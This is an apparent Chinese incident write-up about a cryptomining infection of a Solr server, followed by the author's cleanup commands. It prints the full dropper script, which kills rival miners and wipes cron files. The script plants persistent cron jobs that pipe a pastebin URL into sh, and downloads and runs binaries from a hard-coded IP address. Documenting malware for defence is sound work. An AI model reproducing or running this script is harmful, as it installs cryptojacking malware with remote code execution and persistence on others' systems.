记一次挖矿病毒solr

1 病毒出现

 

 

2  后来发现有个定时任务

 

 

3  去网址查看

 

 

4 把这个脚本拉下来

#!/bin/sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
ps aux | grep -v grep | grep 'givemexyz' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'dbuse' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'javaupDates' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 %
killall /tmp/*
killall /tmp/.*
killall /var/tmp/*
killall /var/tmp/.*
pgrep JavaUpdate | xargs -I % kill -9 %
pgrep kinsing | xargs -I % kill -9 %
pgrep donate | xargs -I % kill -9 %
pgrep kdevtmpfsi | xargs -I % kill -9 %
pgrep sysupdate | xargs -I % kill -9 %
pgrep mysqlserver | xargs -I % kill -9 %
chattr -ia /var/spool/cron/root
crontab -r
crontab -l | grep -e "xg546sAd" | grep -v grep
if [ $? -eq 0 ]; then
  echo "cron good"
else
  (
    crontab -l 2>/dev/null
    echo "*/5 * * * * curl -fsSL https://pastebin.com/raw/xg546sAd | sh"
  ) | crontab -
fi
rm -f /tmp/*
rm -f /tmp/.sola
s2=`whoami`
if [ `whoami` = "root" ];
then
    chattr -ia /etc/cron.d/*
    rm -rf /etc/cron.d/*
    chattr -i /var/spool/cron/crontabs/root
    chattr -i /usr/local/bin/dns
    rm -f /etc/cron.hourly/oanacroner
    rm -f /etc/cron.hourly/oanacrona
    rm -f /etc/cron.daily/oanacroner
    rm -f /etc/cron.daily/oanacrona
    rm -f /etc/cron.monthly/oanacroner
    rm -f /usr/local/bin/dns
    rm -f /etc/update.sh
    chattr -ia /etc/hosts
    echo >/etc/hosts
    chattr +ia /etc/hosts
    chattr -i /etc/sysupdate
    rm -f /etc/sysupdate
    rm -f /etc/config.json
    rm -f /var/tmp/kworkerds
    rm -f /usr/bin/.systemcero
    rm -f /usr/bin/cloudupdate
    rm -f /usr/bin/diskmanagerd
    rm -f /lib/libterminfo.so
    rm -f /bin/httpsntp
    rm -f /bin/ftpsntp
    rm -f /var/tmp/jspserv
    rm -f /usr/sbin/cron
    rm -f /usr/bin/kinsing*
    rm -f /etc/cron.d/kinsing*
    rm -f /usr/bin/node
    chattr -isa /var/spool/cron/*
    rm -rf /var/spool/cron/*
    chattr +isa /tmp/xms
    rm -f /var/tmp/kinsing
    chattr -ia /etc/crontab
    echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/xg546sAd | sh' > /etc/crontab
    chattr +ia /etc/crontab
    chattr -ia /var/spool/cron/root
    chattr -ia /var/spool/cron/crontabs/root
    echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/xg546sAd | bash' >/var/spool/cron/root
    echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/xg546sAd | bash' >/var/spool/cron/crontabs/root
    echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/xg546sAd | sh' > /etc/cron.d/root
    chattr +ia /var/spool/cron/root
    chattr +ia /etc/cron.d/root
    chattr +ia /var/spool/cron/crontabs/root
else
    ps aux | grep -v 'java\|redis\|weblogic\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|atlassian\|awk\|sbin\|WebLogic.sh\|solr\|server\|aux\|httpd\|sh\|sbin|' | grep ${s2:0:7} | awk '{print $2}' | xargs -I % kill -9 %
    ps aux | grep -v 'java\|redis\|weblogic\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|atlassian\|awk\|sbin\|WebLogic.sh\|solr\|server\|aux\|httpd\|sh\|defunct\|sbin|' | grep $s2 | awk '{print $2}' | xargs -I % kill -9 %
fi
chmod +777 /tmp/*
pkill networkservice
pkill networkser+
pkill watchbog
pkill xmrig
rm -rf /tmp/.solr
mkdir /tmp/.solr
p=$(ps auxf|grep solrd|awk '{if($3>=60.0) print $2}')
name=""$p
if [ -z "$name" ]
then
    pkill solr.sh
    pkill solrd
    ps aux | grep -v grep | grep -v 'java\|redis\|mongod\|mysql\|oracle\|tomcat\|grep\|postgres\|confluence\|awk\|aux\|sh' | awk '{if($3>60.0) print $2}' | xargs -I % kill -9 %
    rm -rf /tmp/.solr
    mkdir /tmp/.solr
    chmod +rwx /tmp/.solr
    curl -fsSL http://45.144.3.216:10000/starrail/config/config.json -o /tmp/.solr/config.json
    curl -fsSL http://45.144.3.216:10000/starrail/cbt2zip/setup.exe -o /tmp/.solr/solrd
    curl -fsSL http://45.144.3.216:10000/solr.sh -o /tmp/.solr/solr.sh
    curl -fsSL http://45.144.3.216:10000/genshin -o /tmp/.solr/genshin
    chmod +x /tmp/.solr/genshin
    chmod +x /tmp/.solr/solrd
    chmod +x /tmp/.solr/solr.sh
    nohup /tmp/.solr/solr.sh &>>/dev/null &
    sleep 10
    rm -f /tmp/.solr/solr.sh
else
    exit
fi

　　发现它在系统里设置了5个定时任务，同时把调度任务文件改成了可读，另外在tmp目录有个隐藏文件夹.solr

5 处理（它是10秒的调度周期，人工一个一个处理的话，很可能人工还没处理完，另外的调度任务又把前面的定时任务补上了，所以改成脚本批量处理）

 
 kill -9 11779
 kill -9 11773
 kill -9 11423
 kill -9 11507
 kill -9 11508
 
 rm -rf  /tmp/.solr
  
 chattr -ia /etc/crontab
 chattr -ia /var/spool/cron/root
 chattr -ia /var/spool/cron/crontabs/root
 chattr -ia /etc/cron.d/root
 chattr -ia /var/spool/cron/root
 
cat /dev/null  > /etc/crontab
cat /dev/null  > /var/spool/cron/root
cat /dev/null  > /var/spool/cron/crontabs/root
cat /dev/null  > /etc/cron.d/root
cat /dev/null  > /var/spool/cron/root

 
chattr +ia /etc/crontab
chattr +ia /var/spool/cron/root
chattr +ia /var/spool/cron/crontabs/root
chattr +ia /etc/cron.d/root
chattr +ia /var/spool/cron/root

先把病毒进程进程都kill, 再把宿主文件夹都删除，再把定时任务的可读属性打开，批量清空，再把可读属性加回去,,后续服务器安全性加强以后再改回去, 另外有别的定时任务记得先保存